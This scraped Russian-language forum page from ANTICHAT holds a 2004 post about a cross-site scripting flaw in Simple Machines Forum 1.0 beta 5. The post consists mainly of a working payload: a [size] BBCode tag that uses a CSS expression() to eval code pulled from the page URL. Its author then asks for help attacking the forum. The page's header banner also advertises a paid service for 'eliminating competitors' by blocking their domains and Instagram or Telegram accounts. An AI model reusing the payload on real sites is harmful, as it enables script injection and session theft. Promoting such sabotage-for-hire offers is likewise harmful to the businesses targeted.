УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Уязвимость в Simple machines smf 1.0 beta 5 public

Опции темы

Поиск в этой теме

Опции просмотра

Уязвимость в Simple machines smf 1.0 beta 5 public

23.10.2004, 00:47

Nemirof

Новичок

Регистрация: 23.10.2004

Сообщений: 1

Провел на форуме:
0

Репутация: 0

Уязвимость в Simple machines smf 1.0 beta 5 public

Уязвимость обнаружена в Simple Machines SMF. Удаленный пользователь может выполнить XSS нападение.

SMF не фильтрует данные, представленные пользователем в тэге '[size]'. Пример:

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[size=expression(eval(unescape(document. URL.substring(document.URL.
length-41,document.URL.length))))]Big Exploit[/size][/QUOTE]<span id='postcolor'>

если кому не лень помогите мне с этим форумом разобраться,а то я уже весь мозг напряг

но так ничего и не придумал

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Есть ли уязвимость в форумах созданных на http://www.1bb.ru/ ?	bike	Форумы	2	24.12.2005 17:28
XSS в Simple Machines Forum (SMF) 1.0.3 (и другие)	KEZ	Уязвимости	5	04.06.2005 20:24
SMF 1.0.1. (Simple Machines Forum)	FST	Уязвимости	10	08.04.2005 14:36
Вопрос про уязвимости в Simple machines forum		Форумы	4	27.08.2004 14:09

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход